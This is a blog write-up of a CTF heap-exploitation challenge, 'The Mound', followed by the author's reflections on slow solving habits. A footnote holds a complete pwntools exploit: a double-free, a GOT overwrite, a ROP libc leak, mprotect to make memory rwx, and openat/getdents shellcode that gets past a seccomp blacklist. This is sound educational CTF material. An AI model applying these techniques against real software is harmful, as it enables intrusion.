Getting things wrong: How I spent 24-hours on a beginner's CTF pwn
If you’re only interested in the technical details for The Mound, I have a minified version of this post on ctfdump.
Back in May, I started work on the outlines of a special blogpost. It’s working title was Doing pwn fast: a personal strategy for speedpwning in CTFs, and I scrapped it when I realised how luridly inefficient I can be in the process of pwning. The inefficiency – as revolting as it was – wasn’t an immediate concern, and I moved on.
Fast forward to now. In the leadup to the 9th of August, I spent my weekend huddled in my house, itching away at RaRCTF’s toughest pwnable: an introductory heap CLI that certain professionals finished within hours:
I wasn’t one of those professionals. Have a look at the scoreboard graph for the group of experts I happened to tag along with:
Read the graph: Aug 8, 1PM
minus Aug 7, 1AM
. Accounting for sleep, I spent about a full day on a regular glibc pwn challenge. In the spirit of the Sunk Cost Fallacy, I figured I’d invest even more of my time into picking apart the challenge through this over-elaborate writeup. Crazy, right?
There’s something cathartic, in writing all of this. A eulogy of sorts to the abandoned introspection I attempted in May. Could I have done this challenge faster, if I’d went about things differently?
Maybe, but that’s not the question I’ll be answering in this writeup. I made a number of mistakes in my approach to this challenge, mistakes that I’ll be covering in detail here. In the future, I might try to generalise the problems I’ve identified here for a better rendition of Doing pwn fast, but for now:
The Mound [800]
The glibc heap is too insecure. I took matters into my own hands and swapped efficiency for security.
Files: mound.zip
|
|
Relevant details:
|
|
The seccomp filter is a little bit interesting, but I’ll cover it later on. It’s also worth noting that setup.sh
contains this line:
|
|
Working backwards
mount
has a good number of functions:
There’s a function named win
; that seems rather important.
|
|
The binary doesn’t have PIE or stack canaries or RELRO enabled, so the bulk of this challenge must be in gaining RIP control via a GOT overwrite.
Program outline
This is main()
(partially prettified):
|
|
That’s pretty long. Let’s break it up into two segments: the preamble, and the while(1)
loop.
Preamble
main()
doesn’t have a lot of variables.
|
|
The 3 variables here are user-editable, and we’ll talk about them later. Just keep in mind that user_sz
and idx
are unsigned integers written to with scanf("%d")
calls later on, and s[]
is written to with a non-overflowing, non-zero-terminating1 read()
call.
After this, main()
runs a bunch of initialisers:
|
|
The only complicated function here is moundsetup()
; skip ahead to this part of the writeup if you want to understand it. If not:
main()
’s loop
The CLI gives five options:
|
|
Here’s a skeleton script to deal with the options:
|
|
(5) just calls exit(0)
, but the rest are more complex.
Add sand
|
|
This option is really weird. A user-inputted stream of bytes – not necessarily nul-terminated – are sent to strdup
, and the resultant glibc malloc’d string is stored at arr[idx]
. This means that some of arr[]
’s elements can be a mixture of mound pointers, and actual glibc heap pointers.
It’s also worth noting that the str*
functions here can overflow, depending on whether the stack has extra nul-bytes or not.
Add dirt
|
|
So this is a little bit interesting. The maximum allocation size is 0xfff
; user_sz
is an unsigned
so the single-bounded comparison works out. For some reason, sizes[idx]
is set to 0
instead of user_sz
. This is a little bit weird because of case 3
:
Replace dirt
|
|
sizes[idx]
has to be non-zero for the edit to pass. Since Option 2 sets sizes[idx]
to 0, arr[idx]
can only be edited if it’s a pointer from the glibc heap in case 1
, or if sizes[idx]
can be modified somewhere else.
Remove dirt
|
|
This option calls mfree()
on arr[idx]
. There’s only one bug here, and it’s that arr[idx]
is not zeroed.
So, this is a little bit odd. There are obvious Bad Things going on in these options, but the exploit required isn’t immediately obvious here. I’ll need to dive deeper into the mound
implementation.
Mound
The mound
is kind of like the glibc heap, if it had nothing but the tcache.
At the start of the program, the mound
grabs two big memory spaces from mmap
:
|
|
0xbeef*
stores the actual data distributed by mmalloc
; I’ll call it mound_data
. At the beginning of its life, the entirety of the mound_data
segment constitutes the “top chunk” of the mound
.
0xdead*
stores the metadata for the mound
, kind of like what main_arena
does in glibc. The structure looks something like this:
|
|
The new types in there are further defined like so:
|
|
The most interesting part of each mchunk
is (in my opinion, anyway) the id
element. Every chunk is assigned a random 64-bit UUID (with a very small chance of collision2) upon allocation. When a chunk is freed, that ID gets chucked into the mound_metadata
to protect the program against a double-free.
This might make a lot more sense if I give a flowchart of how things work:
Relevant macros:
|
|
I copied and adapted some of these to python as well:
|
|
With this high-level overview of the implementation in mind, I can return to the previous question: What are the consequences of sending a glibc heap pointer to mfree()
?
Mixing heap allocators
Simply freeing a glibc heap pointer will almost certainly produce an exit(1)
:
|
|
The relevant part of the code to check is the find_id(c->id)
call:
|
|
A typical malloc_chunk
looks like this:
|
|
Because c->id
occupies the same space as a malloc_chunk
’s mchunk_prev_size
member, the prev_size
of the glibc heap chunk is taken as the id
in find_id
. The glibc chunk pointers allocated by strdup()
will never be free, so prev_size == id
should always be 0, and find_id(c->id)
should always result in an error given a glibc heap chunk.
Or not.
The Obvious Solution
It takes me a while, but I eventually realise that the preceding paragraph is false. Sequential malloc chunks can use the prev_size
field to store user data:
This means that if I call strdup("A"*0x17)
twice in succession, the first strdup()
chunk allocated can be used to overwrite the prev_size
of the 2nd strdup()
chunk:
|
|
Using this method, the interpreted mchunk->id
for a glibc heap chunk can be modified to any value within range(0, 1<<56)
.
|
|
What are the consequences of this? Adding a new id
to mound_arena.ids[]
is pretty useless; it would only make allocations harder instead of easier. I could also try to get rid of an ID:
|
|
Then I’d be able to free the same region of memory twice, like this:
|
|
This is a classic tcache dup, except with the mcache
instead. Once you accomplish this much, getting to win()
isn’t much of a challenge.
Getting to win()
Right now, mcache->entries[1] == [arr[0xf] -> arr[0xf]]
. arr[0xf]->next
can be modified to anything, so long as (mcache_entry*)(arr[0xf]->next)->mcache == mound_arena.mcache
. Taking a hint from the the definition, I’ll try to point ->next
to mound_arena.mcache-0x10
, because it’s the only non-user-controlled region that happens to have an mcache
pointer.
|
|
The linked list here is now [arr[0xf] -> mound_arena+0x7ff8]
. As a reminder, the mound_arena
looks like this:
|
|
Right after the mcache
is the top
pointer. Pulling two items off of the mcache linked list will get the top
pointer overwritten with user-controllable data:
|
|
Here, I’m overwriting mound_data.top
with a GOT pointer to gain RIP control:
|
|
And now the exploit reaches win()
:
Simple enough, right?
On the lengths I will go to fool myself: a novel, inferior exploit approach
Picture this: it’s the middle of a Saturday afternoon. I’m looking at gdb in one window, and vim in the next. There’s a little voice at the back of my head pleading me to attend to lunch and other bodily needs, but my eyes are entranced by the dark abyss of the Hex-Rays™ decompiler.
In short, I’m not really thinking straight. But what I do notice, in my digital stupor, are the comments I have open in Pseudocode-Q3:
I had dismissed the immediate relevance of strdup()
with the false reasoning I’d demonstrated at the end of this section. I even got to work on rationalizing the apparent irrelevancy of case 1/3
; my writeup had these lines at one point:
It’s reasonable to assume that
strdup()
was introduced explicitly as an exploit vector for the challenge, so I can expect that there’s a way to editmchunk_prev_size
without callingfree()
. On a wild guess, I expect that the final exploit involves modifyingsizes[idx]
and overflowing into glibc chunk metadata viacase 3
.
Since there’s currently no way to move forward with
case 1/3
, I’ll shift my focus to the other two cases.
The bug I spotted here proved to be unnecessary. Altogether, you can solve the challenge without ever noticing the odd behaviour associated with mmalloc(0)
. Nonetheless, the resulting exploit I cobbled together is interesting, unique enough that I’d prefer to leave the details available to the public.
So, let’s talk about mmalloc()
.
mmalloc()
and mfree()
mmalloc()
is only ever called in case 2
:
|
|
mmalloc()
itself is defined a little oddly:
|
|
If I expand the macros, the bug becomes more obvious:
|
|
As a reminder, the mcache
is structured like this:
|
|
mcache->entries[-1]
really refers to mcache->counts[0x10:0x18]
. By filling up the mcache
bins for 0x120 <= chunk_sz < 0x1a0
, we can get mcache->entries[-1]
to point to any arbitrary location.
The subsequent call to mmalloc_alloc(0)
has a small safety check, as I showed earlier in the flowchart:
|
|
This effectively means that mcache->entries[-1]
needs to point to a known region of user-controlled data, like the mound. I’ll use this bug to allocate a fake chunk with a valid mcache size.
|
|
There’s a TODO
in there, and I’ll explain. The problem with incrementing mcache->counts[0x10:0x18]
one-by-one is that there aren’t enough pointers to go around. By right, if sizeof(arr[])
is only 0x10
, the maximum value for mcache->counts[]
should be 0x10 as well.
I struggled with this for a while. The only way to put more pointers onto the mcache is to do a double-free, but the ID verification list got in the way of that. It was about at this point that I gained a partial understanding of the strategy outlined in Fake IDs, and I started work on an odd, roundabout method of achieving much of the same4:
|
|
And that’s how I used an mcache dup without ever noticing I had an mcache dup. An exploit method so abstruse, it remains 30x slower than the intended solution after optimisation5.
With that mess covered, I can route your attention back to win()
.
Using win()
The seccomp filter for this challenge is mildly interesting. Normally, seccomp’d binaries have a whitelist for permitted syscalls, but in this situation, there’s only a blacklist against a few. The blacklisted items give pause for thought: both execve
and open
are banned, and normally you’d use the former to pop a shell, and the latter for an open-read-write chain.
But before I get ahead of myself, let’s talk about how to get to arbitrary syscalls first.
Moving to rwx
There aren’t a lot of gadgets in the main binary, so it might be better to leak libc first.
|
|
Once that’s done, I can abuse gadgets in libc to convert the mound_data
memory region into an rwx page:
|
|
This only makes sense if mound_data.shellcode
actually points to an area of user-written shellcode. I handled this by writing shellcode to mound_data
using add()
, long before the mcache dup happens:
|
|
Figuring out what shellcode to run isn’t too difficult, if you have a syscall reference in hand. This challenge shows why you shouldn’t use a seccomp blacklist: open
might be banned, but openat certainly isn’t. I’ll start off with some shellcode to open the /pwn/
folder:
|
|
After that, I’ll apply a basic assembly loop to search for .txt
:
|
|
Since the flag’s filename is always 0x20+4 bytes long, the beginning of the flag filename will be at rax-0x20
, and I can use openat
again to write the flag to stdout:
|
|
Getting the flag
For reference, this is what the full script should look like at this point:
|
|
Locally, this works!
|
|
On remote, this is a little more difficult. Paying attention to these two local-specific lines:
|
|
I need some method to guess the PID of the challenge on remote. Considering that the standard maximum PID number is 1<<15
, I decided to try my luck with bruteforcing it5, replacing the code above with,
|
|
And executing the following shell script:
|
|
It doesn’t work the first time around, but I repeat the process to obtain the flag:
|
|
And with that, I’m done with the technical stuff.
Mistakes
[Content warning: unsubstantiated opinions]
I. Pwn isn’t RE
CTF pwn binaries are usually small enough to fully reverse engineer, and The Mound was no exception. But the reversing effort always arrives with the cost of Time. The entire section of this writeup dedicated to understanding the heap implementation was written during the 36-hours between me starting this challenge and mound.py
spitting out the flag. The assumption I’ve been rolling with, in all of the pwnables do, is that boosting time(reversing binaries)
will pay off by a comparable reduction in time(scripting and debugging)
.
That belief didn’t work out for this challenge. At the end of the main()
reversing effort, I noted that I observed a few Bad Things going on in the switch-cases. So I spent a thousand-or-so words reversing the interworkings of the mound
to understand that sending a glibc pointer to mfree()
tends to produce Double free
exit(1)
calls as a result of a null prev_size
.
Do you know how else I could’ve discovered that? By just testing out the damn thing and getting a backtrace:
|
|
Oh, look! It stops in find_id()
. Which only stops because *((void*)p-0x10) == NULL
for the p
in mfree(p)
. So I should probably find a way to edit prev_size
for one of the strdup()
’d pointers.
Five minutes to figure out something I spent 5 hours in IDA Pro for. There are situations where a myopic focus on testing crashes might not work out, but The Mound is certainly not one of them. I can’t speak for ptr-yudai, but judging by his long article on adapting fuzzing techniques for CTF pwnables, I expect that there’s a lot more to gain from a lucid application of dynamic analysis than there is from my oddball approach of eyeballing everything I can in IDA until something sticks.
I might re-evaluate this section if someone comes around with a really fast CTF Reversing strategy, but until then:
II. Pattern matching
CTF challenges are full of patterns and trends. When one popular CTF introduces a unique challenge, other CTFs tend to ape6 after the original design. v8 challenges are a good example of this:
Prior to 2018, nothing. This year, there’s already been 4+ CTFs with v8 challenges. Compare this with a graph of Chrome’s market share:
The IRL relevance of v8 hasn’t changed (much), so what gives?
There’s a good comparison to be made between CTF trends and memetic reproduction. An established CTF comes up with an interesting challenge design. A decade or so ago, this might’ve been “Return Oriented Programming”. Go back a few years and you’ll see everyone interested in nifty House of *
exploits. In the past few years, there’s been an obsession with things like v8 oobs and printf()
one-shots.
This is an intentionally broad picture; the trends I’ve listed here are cherry-picked obvious ones. There are smaller, less identifiable trends, and these weaker trends are a part of why I went down the weird exploit path I did for The Mound.
Instinctively, I try to pull meta-games using the trends I observe. If it’s a v8 challenge, I try to get an oob JSArray, even though that kind of stuff is a lot harder with contemporary security measures. If there’s a text input, I’ll bash in "A"*0x1000
for the sake of it. And if there’s a special number that’ll produce a negative array index — a smaller pattern that I’ve unfortunately internalised — I’ll do my best to shape my exploit into abusing it, even if I have to use more powerful primitives to get there.
It was with this bias that I approached The Mound, even after I learnt how to double-free a mound
allocated chunk. I understood on a subconscious level that a double-free was almost certainly a more powerful tool than what I wanted to swing it around for (incrementing mcache->counts[]
), but if it follows what I’ve seen before, I have an expectation that things will go the same way.
I’ll admit that this is a little bit theoretical, but I would have saved a lot of time if I could’ve just convinced myself to abort with the mcache->entries[-1]
exploit path early on. I’m not exactly sure what I can do to prevent this kind of thing in the future, either. Something that deserves more thought.
III. Things I haven’t considered?
I could be doing pwn in sub-optimal ways I can’t identify as sub-optimal on my own. I’m hoping that other writeups on this challenge (if they arrive) can provide the kind of external insight on how challenges can be solved faster.
That’s it.
Footnotes
This isn’t particularly useful. There’s no way to leak pointers outside of
win()
.I tried looking for seeds that would produce repeated cycles:
1 2 3 4 5 6 7 8
from ctypes import CDLL LIBC = CDLL('libc.so.6') t = LIBC.time(0) t &= 0xffffffffffff0000 for i in range(t,t+0xffff): LIBC.srand(i) seen = set(LIBC.rand() for j in range(0x1000)) if len(seen) < 0xff0: print(i, len(seen))
The script found nothing.
In case you’re wondering how there’s a pseudocode reference to
mound_arena.mcache->entries[]
, as opposed to an ugly red*(_QWORD *)(MEMORY[0xDEAD0008008] + 8 * (v3 + 2LL) + 8)
reference:- Define the
mound_metadata
class (and the otherstruct
s from here) in theStructures
tab; you should see an entry like this in the local types tab (Shift+F1): - In the IDA View tab, select
Edit --> Segments --> Create Segment
; fill the pop-up window with sensible values - put a variable at
mound_arena:00000DEAD0000000
and retype it (Y
) as amound_metadata
.
- Define the
The code block there isn’t supposed to make sense. Throughout the writeup, I’ve tried to keep declarations and variables consistent across code snippets, but getting this code to match with everything else in the writeup is just a little bit intractable.
This is the reason why I ended up searching for the intended solution. My silly alternative method for getting to
win()
doesn’t work on remote; the time cost associated with a single connection – let alone bruteforcing the PID – makes it impossible to incrementmcache->entries[-1]
without an absurdly low ping. The 30x number comes from a crude measure of how many times the exploit callschoose()
. For the intended solution, it’s about a hundred. The negative indexing process takes around ~3000 calls on average, and this shakes out to an exploit duration of around 15 minutes per guess on remote. Feel free to try it out youself:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122
from random import randint from collections import namedtuple from ctypes import CDLL from tqdm import tqdm from pwnscripts import * BEEF, DEAD = 0xbeef0000000, 0xdead0000000 mound_arena = namedtuple('mound_metadata', 'base ids mcache top')(DEAD, DEAD+0x8, DEAD+0x8008, DEAD+0x8010) mound_data = namedtuple('beef', 'base mcache dents shellcode')(BEEF, BEEF+0x10, BEEF+0x10000, BEEF+0x100) midxs = namedtuple('midb', 'prev_size_editor fakeid_provider strdup mcache_dup got_overwriter')(5, 6, 0, 1, 2) context.binary = 'mound' context.libc = 'libc.so.6' libc = CDLL('libc.so.6') t = libc.time(0) if args.REMOTE: r = remote('193.57.159.27', 41932) #r = remote('localhost', 8329) libc.srand(t^int(args.PID)) # bruteforce PID else: r = context.binary.process() libc.srand(t^r.pid) # I/O methods def choose(opt: int): r.sendlineafter(b'> ', str(opt)) def strdup(s: bytes, i: int): choose(1) r.sendafter(b'Pile: ', s) r.sendlineafter(b'index: ', str(i)) def add(midx: int, idx: int, s: bytes): choose(2) sz = midx2rsize(midx) assert sz < 0x1000 assert len(s) <= sz r.sendlineafter('pile: ', str(sz)) r.sendlineafter('index: ', str(idx)) r.sendafter('Pile: ', s) def edit(idx: int, s: bytes): choose(3) r.sendlineafter('index: ', str(idx)) r.sendafter('pile: ', s) def free(idx: int): choose(4) r.sendlineafter('index: ', str(idx)) def csize2midx(x:int): return (x>>4)-2 def midx2csize(i:int): return (i+2)<<4 def size2request(x:int): return x-0x10 def request2size(x:int): return x+0x10 def midx2rsize(i:int): return size2request(midx2csize(i)) def r64bit(): return libc.rand()+(libc.rand()<<32) # emulate rand64bit def r64(): return randint(0, (1<<64)-1) # a separate, unrelated function to produce random numbers midxs = namedtuple('midb', 'first_alloc overflower incrementer fakechunk bugged got_overwriter entries')(1, 4, 0, 2, -1, 3, 0x10) mound_data = namedtuple('beef', 'base mcache fakechunk dents shellcode')(BEEF, BEEF+0x10, BEEF+0x100, BEEF+0x10000, BEEF+0x190) def fake_mcache_entry(sz: int, fd=0, rid=None, mcache=mound_data.mcache): if rid is None: rid = r64() return fit(rid, sz, mcache, fd) add(midxs.first_alloc, 0, fake_mcache_entry(sz=midx2csize(midxs.fakechunk))) add(midxs.overflower, 1, b'a') # chunk to be overflowed for _ in range(2): r64bit() O_DIRECTORY, FLAG_LEN = 0x10000, 100 # use reasonably long values here sc = '' # step 1: getting a directory listing sc+= shellcraft.pushstr('/pwn') # put "/pwn" on the stack sc+= shellcraft.openat(0, 'rsp', O_DIRECTORY) # use openat in lieu of open. rsp because of pushstr sc+= 'mov QWORD PTR [{}], rax\n'.format(mound_data.base) # Store the resultant fd _somewhere_ accessible (mound_data.base) sc+= shellcraft.getdents64('rax', mound_data.dents, 0x10000) # use getdents to list directory # step 2: loop through the dents data to find the flag filename sc+=shellcraft.mov('rax', mound_data.dents) sc+= 'loop:\n' sc+= 'inc rax\n' sc+= 'cmp DWORD PTR [rax], {}\n'.format(hex(u32('.txt'))) sc+= 'jne loop\n' # step 3: open the flag file, read to _somewhere_ (mound_arena.base), and write to stdout sc+= 'lea rbx, [rax-0x20]\n' sc+= 'mov rax, QWORD PTR [{}]\n'.format(mound_data.base) sc+= shellcraft.openat('rax', 'rbx', 0) sc+= shellcraft.read('rax', mound_arena.base, FLAG_LEN) sc+= shellcraft.write(1, mound_arena.base, FLAG_LEN) sc = asm(sc) # don't call asm() twice add(1+csize2midx(request2size(len(sc))), 8, sc) # dump shellcode somewhere in mound_data for later use for _ in range(3): r64bit() # There have been 5 rand64bit() calls so far; account for them. # The substance of the exploit: getting mcache->entries[-1] to point to a fake mchunk for midx,b in tqdm((i+midxs.entries,b) for i,b in enumerate(pack(mound_data.fakechunk)) if b): def pad(s: bytes): return s.rjust(0x17, b'a') strdup(pad(b''), 0xf) # Remember that maximally, user_sz = 8 (mod 0x10) for a given glibc heap chunk. strdup(pad(b''), 0xe) # A string has a trailing nul-byte, so maximally strlen(s) = 7 (mod 0x10) add(midx, 2, b'hi') while (pred := r64bit())>>56: add(midx, 2, b'hi') for _ in range(b): free(2) edit(0xf, pad(pack(r64())[:7])) free(0xe) edit(0xf, pad(pack(pred)[:7])) add(midxs.incrementer, 5, b'a'*0x10) # , free it + a chunk right in front of it, overflow into the real freed chunk's metadata to add(midxs.bugged, 2, b'') # Get the fake chunk allocated, free(2) # free it + the chunk overlapping with the fake chunk free(1) # prepare to overwrite freed mchunk metadata such that ->next points to a fake chunk on the mound_arena add(midxs.fakechunk, 2, b'overwrite!'.ljust(0x10,b'a') + fake_mcache_entry(sz=999, fd=mound_arena.mcache-0x10)) add(midxs.overflower, 1, 'hi') # put the fake mound_arena chunk on the mcache add(midxs.overflower, 1, fit(mound_data.mcache, context.binary.got['setvbuf'])) # replace mound_arena->top with the GOT add(midxs.got_overwriter, 2, pack(context.binary.sym.win)) # overwrite a good function with win() (I use scanf() here) # win() will execute. Leak libc in the first cycle. R = ROP(context.binary) R.raw(0x48*b'a') R.puts(context.binary.got['read']) R.win() r.sendlineafter(';)\n', R.chain()) context.libc.symbols['read'] = unpack(r.recvline()[:6], 'all') # Using libc, change 0xbeef* to an rwx page, and jump to the shellcode that was allocated there earlier on. R = ROP(context.libc) R.raw(0x48*b'a') R.mprotect(mound_data.base, 0x400000, 7) R.call(mound_data.shellcode) r.sendlineafter(';)\n', R.chain()) # get flag print(r.recvall())
This isn’t meant as an attack against the ‘originality’ of CTF challenge makers. Good CTF challenge makers have to be CTF players themselves, and where else would you draw inspiration from, if not prior CTFs?
If any part of this writeup was interesting for you, try submitting a comment below; I’ve only just added utteranc.es to this site.